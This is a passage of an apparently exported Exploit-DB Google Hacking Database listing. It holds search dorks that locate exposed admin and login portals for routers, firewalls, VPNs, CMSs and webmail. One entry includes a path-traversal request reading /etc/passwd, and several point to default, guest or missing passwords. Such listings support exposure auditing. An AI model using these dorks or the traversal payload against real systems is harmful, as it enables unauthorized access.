<link>https://www.exploit-db.com/ghdb/1042</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;This section is for Administrators only. If you are an administrator then please&quot;</shortDescription>
<textualDescription>Nothing special, just one more set of login pages, but the &quot;Administrators only&quot; line is a classic.</textualDescription>
<query>&quot;This section is for Administrators only. If you are an administrator then please&quot;</query>
<querystring>https://www.google.com/search?q=%22This+section+is+for+Administrators+only.+If+you+are+an+administrator+then+please%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-07-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7918</id>
<link>https://www.exploit-db.com/ghdb/7918</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;This system&quot; inurl:login</shortDescription>
<textualDescription># Google Dork: &quot;This system&quot; inurl:login
# Pages Containing Login Portals
# Date:16/06/2022
# Exploit Author: JadeWolf</textualDescription>
<query>&quot;This system&quot; inurl:login</query>
<querystring>https://www.google.com/search?q=&quot;This system&quot; inurl:login</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>JadeWolf</author>
</entry>
<entry>
<id>4339</id>
<link>https://www.exploit-db.com/ghdb/4339</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;This WebUI administration tool requires scripting support&quot; intitle:'Login' intext:'Admin Name:' -score</shortDescription>
<textualDescription>Pages containing Login Portals
Juniper Netscreen WebUI login page.</textualDescription>
<query>&quot;This WebUI administration tool requires scripting support&quot; intitle:'Login' intext:'Admin Name:' -score</query>
<querystring>https://www.google.com/search?q=&quot;This WebUI administration tool requires scripting support&quot; intitle:'Login' intext:'Admin Name:' -score</querystring>
<edb></edb>
<date>2016-10-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6383</id>
<link>https://www.exploit-db.com/ghdb/6383</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;TOPdesk ApplicationServer&quot; inurl:/index.jsp</shortDescription>
<textualDescription># Google Dork: &quot;TOPdesk ApplicationServer&quot; inurl:/index.jsp
# Pages containing login portals.
# Date: 8/07/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;TOPdesk ApplicationServer&quot; inurl:/index.jsp</query>
<querystring>https://www.google.com/search?q=&quot;TOPdesk ApplicationServer&quot; inurl:/index.jsp</querystring>
<edb></edb>
<date>2020-07-08</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>278</id>
<link>https://www.exploit-db.com/ghdb/278</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;ttawlogin.cgi/?action=&quot;</shortDescription>
<textualDescription>Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&amp;pg=../../../../../../../../../../../../../../../etc/passwd</textualDescription>
<query>&quot;ttawlogin.cgi/?action=&quot;</query>
<querystring>https://www.google.com/search?q=%22ttawlogin.cgi%2F%3Faction%3D%22</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6795</id>
<link>https://www.exploit-db.com/ghdb/6795</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F660&quot;</shortDescription>
<textualDescription># Dork: &quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F660&quot;</textualDescription>
<query>&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F660&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F660&quot;</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6802</id>
<link>https://www.exploit-db.com/ghdb/6802</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F670&quot;</shortDescription>
<textualDescription># Dork: &quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F670&quot;</textualDescription>
<query>&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F670&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Username&quot; &quot;Password&quot; &quot;Please login to continue&quot; intitle:&quot;F670&quot;</querystring>
<edb></edb>
<date>2021-02-17</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7199</id>
<link>https://www.exploit-db.com/ghdb/7199</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Username&quot; &quot;Password&quot; &quot;This system is for authorized use only.&quot; intitle:&quot;Gaia&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Username&quot; &quot;Password&quot; &quot;This system is for authorized use only.&quot; intitle:&quot;Gaia&quot;
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Username&quot; &quot;Password&quot; &quot;This system is for authorized use only.&quot; intitle:&quot;Gaia&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Username&quot; &quot;Password&quot; &quot;This system is for authorized use only.&quot; intitle:&quot;Gaia&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4718</id>
<link>https://www.exploit-db.com/ghdb/4718</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;username&quot; &quot;password&quot; intitle:&quot;login here&quot;</shortDescription>
<textualDescription>More login portals
Bruno Schmid
</textualDescription>
<query>&quot;username&quot; &quot;password&quot; intitle:&quot;login here&quot;</query>
<querystring>https://www.google.com/search?q=&quot;username&quot; &quot;password&quot; intitle:&quot;login here&quot;</querystring>
<edb></edb>
<date>2018-03-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>596</id>
<link>https://www.exploit-db.com/ghdb/596</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;VHCS Pro ver&quot; -demo</shortDescription>
<textualDescription>VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus.</textualDescription>
<query>&quot;VHCS Pro ver&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22VHCS+Pro+++ver%22+-demo&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6610</id>
<link>https://www.exploit-db.com/ghdb/6610</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Vigor Login Page&quot; + intext:&quot;Group&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Vigor Login Page&quot; + intext:&quot;Group&quot;
# Vigor router login portals.
# Date: 14/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Vigor Login Page&quot; + intext:&quot;Group&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Vigor Login Page&quot; + intext:&quot;Group&quot;</querystring>
<edb></edb>
<date>2020-10-14</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5365</id>
<link>https://www.exploit-db.com/ghdb/5365</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;viostor system&quot;</shortDescription>
<textualDescription>online device login page:
&quot;viostor system&quot;
Reza Abasi(Turku)
</textualDescription>
<query>&quot;viostor system&quot;</query>
<querystring>https://www.google.com/search?q=&quot;viostor system&quot;</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>176</id>
<link>https://www.exploit-db.com/ghdb/176</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;VNC Desktop&quot; inurl:5800</shortDescription>
<textualDescription>VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800.</textualDescription>
<query>&quot;VNC Desktop&quot; inurl:5800</query>
<querystring>https://www.google.com/search?q=%22VNC+Desktop%22+inurl%3A5800</querystring>
<edb></edb>
<date>2004-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5009</id>
<link>https://www.exploit-db.com/ghdb/5009</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;vpnssl&quot;</shortDescription>
<textualDescription>I found the following dork by typing &quot;vpnssl&quot; on Google. It contains logins
portals containing vpnssl companies access.
</textualDescription>
<query>&quot;vpnssl&quot;</query>
<querystring>https://www.google.com/search?q=&quot;vpnssl&quot;</querystring>
<edb></edb>
<date>2018-11-06</date>
<author>John Locke</author>
</entry>
<entry>
<id>5238</id>
<link>https://www.exploit-db.com/ghdb/5238</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Web Analytics powered by Open Web Analytics - v: 1.6.2&quot;</shortDescription>
<textualDescription>Find login portals for websites using Open Web Analytics.
By GnosticPlayers
</textualDescription>
<query>&quot;Web Analytics powered by Open Web Analytics - v: 1.6.2&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Web Analytics powered by Open Web Analytics - v: 1.6.2&quot;</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>GnosticPlayers</author>
</entry>
<entry>
<id>1289</id>
<link>https://www.exploit-db.com/ghdb/1289</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Web-Based Management&quot; &quot;Please input password to login&quot; -inurl:johnny.ihackstuff.com</shortDescription>
<textualDescription>This dork finds firewall/vpn products from fiber logic. They only require a one-factor authentication.</textualDescription>
<query>&quot;Web-Based Management&quot; &quot;Please input password to login&quot; -inurl:johnny.ihackstuff.com</query>
<querystring>https://www.google.com/search?q=%22Web-Based+Management%22+%22Please+input+password+to+login%22+-inurl:johnny.ihackstuff.com&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>571</id>
<link>https://www.exploit-db.com/ghdb/571</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;WebExplorer Server - Login&quot; &quot;Welcome to WebExplorer Server&quot;</shortDescription>
<textualDescription>WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people.</textualDescription>
<query>&quot;WebExplorer Server - Login&quot; &quot;Welcome to WebExplorer Server&quot;</query>
<querystring>https://www.google.com/search?q=%22WebExplorer+Server+-+Login%22+%22Welcome+to+WebExplorer+Server%22&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4872</id>
<link>https://www.exploit-db.com/ghdb/4872</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;webkactus&quot;</shortDescription>
<textualDescription>Scrape websites using webkactus software login portals.
~ CrimsonTorso
</textualDescription>
<query>&quot;webkactus&quot;</query>
<querystring>https://www.google.com/search?q=&quot;webkactus&quot;</querystring>
<edb></edb>
<date>2018-06-25</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>419</id>
<link>https://www.exploit-db.com/ghdb/419</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;WebSTAR Mail - Please Log In&quot;</shortDescription>
<textualDescription>@stake, Inc. advisory: &quot;4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.&quot;See also: http://www.securityfocus.com/archive/1/368778</textualDescription>
<query>&quot;WebSTAR Mail - Please Log In&quot;</query>
<querystring>https://www.google.com/search?q=%22WebSTAR+Mail+-+Please+Log+In%22</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3861</id>
<link>https://www.exploit-db.com/ghdb/3861</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Welcome to phpMyAdmin&quot; + &quot;Username:&quot; + &quot;Password:&quot; + &quot;Language:&quot; + &quot;Afrikaans&quot;</shortDescription>
<textualDescription>Finds cPanel login pages.
- Andy G - twitter.com/vxhex</textualDescription>
<query>&quot;Welcome to phpMyAdmin&quot; + &quot;Username:&quot; + &quot;Password:&quot; + &quot;Language:&quot; + &quot;Afrikaans&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Welcome to phpMyAdmin&quot; + &quot;Username:&quot; + &quot;Password:&quot; + &quot;Language:&quot; + &quot;Afrikaans&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7192</id>
<link>https://www.exploit-db.com/ghdb/7192</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Welcome to Polycom Web Configuration Utility&quot; &quot;Login as&quot; &quot;Password&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Welcome to Polycom Web Configuration Utility&quot; &quot;Login as&quot; &quot;Password&quot;
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Welcome to Polycom Web Configuration Utility&quot; &quot;Login as&quot; &quot;Password&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Welcome to Polycom Web Configuration Utility&quot; &quot;Login as&quot; &quot;Password&quot;</querystring>
<edb></edb>
<date>2021-09-13</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5922</id>
<link>https://www.exploit-db.com/ghdb/5922</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Welcome to Sentry, please log in:&quot;</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos
</textualDescription>
<query>&quot;Welcome to Sentry, please log in:&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Welcome to Sentry, please log in:&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>3778</id>
<link>https://www.exploit-db.com/ghdb/3778</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Welcome to Sitecore&quot; + &quot;License Holder&quot;</shortDescription>
<textualDescription>Sitecore CMS detection.</textualDescription>
<query>&quot;Welcome to Sitecore&quot; + &quot;License Holder&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Welcome to Sitecore&quot; + &quot;License Holder&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6991</id>
<link>https://www.exploit-db.com/ghdb/6991</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Yeastar Information Technology Co., Ltd. All Rights Reserved.&quot; -yeastar.com</shortDescription>
<textualDescription># Dork: &quot;Yeastar Information Technology Co., Ltd. All Rights Reserved.&quot; -yeastar.com</textualDescription>
<query>&quot;Yeastar Information Technology Co., Ltd. All Rights Reserved.&quot; -yeastar.com</query>
<querystring>https://www.google.com/search?q=&quot;Yeastar Information Technology Co., Ltd. All Rights Reserved.&quot; -yeastar.com</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6456</id>
<link>https://www.exploit-db.com/ghdb/6456</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;You have accessed a private computer system&quot; inurl:login</shortDescription>
<textualDescription># Google Dork: &quot;You have accessed a private computer system&quot; inurl:login
# Pages containing login portals.
# Date: 29/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;You have accessed a private computer system&quot; inurl:login</query>
<querystring>https://www.google.com/search?q=&quot;You have accessed a private computer system&quot; inurl:login</querystring>
<edb></edb>
<date>2020-07-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1032</id>
<link>https://www.exploit-db.com/ghdb/1032</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;You have requested access to a restricted area of our website. Please authenticate yourself to continue.&quot;</shortDescription>
<textualDescription>BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem.</textualDescription>
<query>&quot;You have requested access to a restricted area of our website. Please authenticate yourself to continue.&quot;</query>
<querystring>https://www.google.com/search?q=%22You+have+requested+access+to+a+restricted+area+of+our+website.+Please+authenticate+yourself+to+continue.%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1088</id>
<link>https://www.exploit-db.com/ghdb/1088</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;You have requested to access the management functions&quot; -.edu</shortDescription>
<textualDescription>Terracotta web manager admin login portal.</textualDescription>
<query>&quot;You have requested to access the management functions&quot; -.edu</query>
<querystring>https://www.google.com/search?q=%22You+have+requested+to+access+the+management+functions%22++-.edu&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6120</id>
<link>https://www.exploit-db.com/ghdb/6120</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;You need to be logged in to see your course progress.&quot;</shortDescription>
<textualDescription>I want to share a google dork which helps to reveal all the website using wp-courseware plugin. and it reveals website having course hosted on there website.
Google Dork: &quot;You need to be logged in to see your course progress.&quot;
Date: [23/05/2020]
Author: Nitesh kumar pandey
Vendor Homepage: https://flyplugins.com/wp-courseware/
</textualDescription>
<query>&quot;You need to be logged in to see your course progress.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;You need to be logged in to see your course progress.&quot;</querystring>
<edb></edb>
<date>2020-05-25</date>
<author>Nitesh kumar pandey</author>
</entry>
<entry>
<id>1364</id>
<link>https://www.exploit-db.com/ghdb/1364</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(intitle:&quot;Please login - Forums powered by UBB.threads&quot;)|(inurl:login.php &quot;ubb&quot;)</shortDescription>
<textualDescription>Logins for Forums powered by UBB.threads</textualDescription>
<query>(intitle:&quot;Please login - Forums powered by UBB.threads&quot;)|(inurl:login.php &quot;ubb&quot;)</query>
<querystring>https://www.google.com/search?q=(intitle:%22Please+login+-+Forums+powered+by+UBB.threads%22)%7C(inurl:login.php+%22ubb%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1354</id>
<link>https://www.exploit-db.com/ghdb/1354</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(intitle:&quot;Please login - Forums powered by WWWThreads&quot;)|(inurl:&quot;wwwthreads/login.php&quot;)|(inurl:&quot;wwwthreads/login.pl?Cat=&quot;)</shortDescription>
<textualDescription>&quot;WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.&quot;</textualDescription>
<query>(intitle:&quot;Please login - Forums powered by WWWThreads&quot;)|(inurl:&quot;wwwthreads/login.php&quot;)|(inurl:&quot;wwwthreads/login.pl?Cat=&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%28intitle%3A%22Please+login+-+Forums+powered+by+WWWThreads%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.php%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.pl%3FCat%3D%22%29</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1356</id>
<link>https://www.exploit-db.com/ghdb/1356</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(intitle:&quot;rymo Login&quot;)|(intext:&quot;Welcome to rymo&quot;) -family</shortDescription>
<textualDescription>&quot;rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.&quot;</textualDescription>
<query>(intitle:&quot;rymo Login&quot;)|(intext:&quot;Welcome to rymo&quot;) -family</query>
<querystring>https://www.google.com/search?q=(intitle%3A%22rymo+Login%22)%7C(intext%3A%22Welcome+to+rymo%22)+-family&amp;oq=(intitle%3A%22rymo+Login%22)%7C(intext%3A%22Welcome+to+rymo%22)+-family&amp;aqs=chrome..69i57.189j0j4&amp;sourceid=chrome&amp;ie=UTF-8</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1402</id>
<link>https://www.exploit-db.com/ghdb/1402</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(intitle:&quot;SilkyMail by Cyrusoft International, Inc.&quot;)|(intitle:&quot;Welcome to SilkyMail&quot;)|(intitle:&quot;Willkommen bei SilkyMail&quot;)|(inurl:adv_login.php3)|(in</shortDescription>
<textualDescription>silkyMail is a free internet email client, from www.cyrusoft.com, that runs in your browser. The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:&quot;SilkyMail by Cyrusoft International, Inc.&quot;)|(intitle:&quot;Welcome to SilkyMail&quot;)|(intitle:&quot;Willkommen bei SilkyMail&quot;)|(inurl:adv_login.php3)|(inurl:&quot;silkymail/imp/login.php3&quot;)http://www.google.com/search?num=100&amp;hl=en&amp;lr=&amp;safe=off&amp;q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&amp;btnG=Search</textualDescription>
<query>(intitle:&quot;SilkyMail by Cyrusoft International, Inc</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28</querystring>
<edb></edb>
<date>2006-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1366</id>
<link>https://www.exploit-db.com/ghdb/1366</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(intitle:&quot;WmSC e-Cart Administration&quot;)|(intitle:&quot;WebMyStyle e-Cart Administration&quot;)</shortDescription>
<textualDescription>Login Pages for WebMyStyle.&quot;WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.&quot;</textualDescription>
<query>(intitle:&quot;WmSC e-Cart Administration&quot;)|(intitle:&quot;WebMyStyle e-Cart Administration&quot;)</query>
<querystring>https://www.google.com/search?q=(intitle:%22WmSC+e-Cart+Administration%22)%7C(intitle:%22WebMyStyle+e-Cart+Administration%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>408</id>
<link>https://www.exploit-db.com/ghdb/408</link>
<category>Pages Containing Login Portals</category>
<shortDescription>(inurl:&quot;ars/cgi-bin/arweb?O=0&quot; | inurl:arweb.jsp) -site:remedy.com -site:mil</shortDescription>
<textualDescription>From the vendor site: &quot;Remedy’s Action Request SystemÂî is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.&quot;Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails.</textualDescription>
<query>(inurl:&quot;ars/cgi-bin/arweb?O=0&quot; | inurl:arweb.jsp)</query>
<querystring>https://www.google.com/search?num=100&amp;q=%28inurl%3A%22ars%2Fcgi-bin%2Farweb%3FO%3D0%22+%7C+inurl%3Aarweb.jsp%29+-site%3Aremedy.com+-site%3Amil</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4427</id>
<link>https://www.exploit-db.com/ghdb/4427</link>
<category>Pages Containing Login Portals</category>
<shortDescription>-english -help -printing -companies -archive -wizard -pastebin -adult -keywords &quot;Warning: this page requires Javascript. To correctly view, please enable it in your browser&quot;</shortDescription>
<textualDescription>this one is for fortinet firewalls login web based . thanks #th3jackers</textualDescription>
<query>-english -help -printing -companies -archive -wizard -pastebin -adult -keywords &quot;Warning: this page requires Javascript. To correctly view, please enable it in your browser&quot;</query>
<querystring>https://www.google.com/search?q=-english -help -printing -companies -archive -wizard -pastebin -adult -keywords &quot;Warning: this page requires Javascript. To correctly view, please enable it in your browser&quot;</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5244</id>
<link>https://www.exploit-db.com/ghdb/5244</link>
<category>Pages Containing Login Portals</category>
<shortDescription>-youtube.com login | password | username intitle:&quot;assessment&quot;</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>-youtube.com login | password | username intitle:&quot;assessment&quot;</query>
<querystring>https://www.google.com/search?q=-youtube.com login | password | username intitle:&quot;assessment&quot;</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5144</id>
<link>https://www.exploit-db.com/ghdb/5144</link>
<category>Pages Containing Login Portals</category>
<shortDescription>/adp/self/service/login</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding to login portals of Employees and admins
which using Automatic Data Processing Inc., commonly known as ADP, is an
American provider of human resources management software and services.
Until 2014, ADP was one of four American companies in the S&amp;P 500 to have a
AAA credit rating from Standard &amp; Poor's and Moody's.
Enjoy :)
Dork : /adp/self/service/login
Date : 04/3/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>/adp/self/service/login</query>
<querystring>https://www.google.com/search?q=/adp/self/service/login</querystring>
<edb></edb>
<date>2019-03-04</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>452</id>
<link>https://www.exploit-db.com/ghdb/452</link>
<category>Pages Containing Login Portals</category>
<shortDescription>4images Administration Control Panel</shortDescription>
<textualDescription>4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries.</textualDescription>
<query>&quot;4images Administration Control Panel&quot;</query>
<querystring>https://www.google.com/search?q=%224images+Administration+Control+Panel%22</querystring>
<edb></edb>
<date>2004-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>7528</id>
<link>https://www.exploit-db.com/ghdb/7528</link>
<category>Pages Containing Login Portals</category>
<shortDescription>=?UTF-8?Q?intext:&quot;admin&quot;_AND_&quot;login&quot;_|_&quot;sign?= =?UTF-8?Q?_in&quot;_AND_&quot;=C2=A9&quot;_AND_&quot;rights_reserved&quot;?=</shortDescription>
<textualDescription># Google Dork: intext:&quot;admin&quot; AND &quot;login&quot; | &quot;sign in&quot; AND &quot;©&quot; AND &quot;rights reserved&quot;
# Pages Containing Login Portals
# Date:29/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>intext:&quot;admin&quot; AND &quot;login&quot; | &quot;sign in&quot; AND &quot;©&quot; AND &quot;rights reserved&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;admin&quot; AND &quot;login&quot; | &quot;sign in&quot; AND &quot;©&quot; AND &quot;rights reserved&quot;</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>3835</id>
<link>https://www.exploit-db.com/ghdb/3835</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintext: &quot;Please login to continue...&quot; &quot;ZTE Corporation. All rights reserved.&quot;</shortDescription>
<textualDescription>Reported by: Jasper Briels</textualDescription>
<query>allintext: &quot;Please login to continue...&quot; &quot;ZTE Corporation. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=allintext: &quot;Please login to continue...&quot; &quot;ZTE Corporation. All rights reserved.&quot;</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6638</id>
<link>https://www.exploit-db.com/ghdb/6638</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintext:&quot;Copperfasten Technologies&quot; &quot;Login&quot;</shortDescription>
<textualDescription># Title: Find websites using SpamTitan system
# Google Dork: allintext:&quot;Copperfasten Technologies&quot; &quot;Login&quot;
# Author: KawaiiPantsu
</textualDescription>
<query>allintext:&quot;Copperfasten Technologies&quot; &quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;Copperfasten Technologies&quot; &quot;Login&quot;</querystring>
<edb></edb>
<date>2020-10-26</date>
<author>KawaiiPantsu</author>
</entry>
<entry>
<id>7059</id>
<link>https://www.exploit-db.com/ghdb/7059</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintext:Welcome to the LabTech Web Portal</shortDescription>
<textualDescription># Google Dork: allintext:Welcome to the LabTech Web Portal
# LabTech Web Portal
# Date: 10-07-2021
# Exploit Author: Kamran Saifullah
</textualDescription>
<query>allintext:Welcome to the LabTech Web Portal</query>
<querystring>https://www.google.com/search?q=allintext:Welcome to the LabTech Web Portal</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>4831</id>
<link>https://www.exploit-db.com/ghdb/4831</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle: &quot;Flexi Press System&quot;</shortDescription>
<textualDescription> This dork will show login portal: Flexi Press System
mil1200
</textualDescription>
<query>allintitle: &quot;Flexi Press System&quot;</query>
<querystring>https://www.google.com/search?q=allintitle: &quot;Flexi Press System&quot;</querystring>
<edb></edb>
<date>2018-05-25</date>
<author>mil1200</author>
</entry>
<entry>
<id>8245</id>
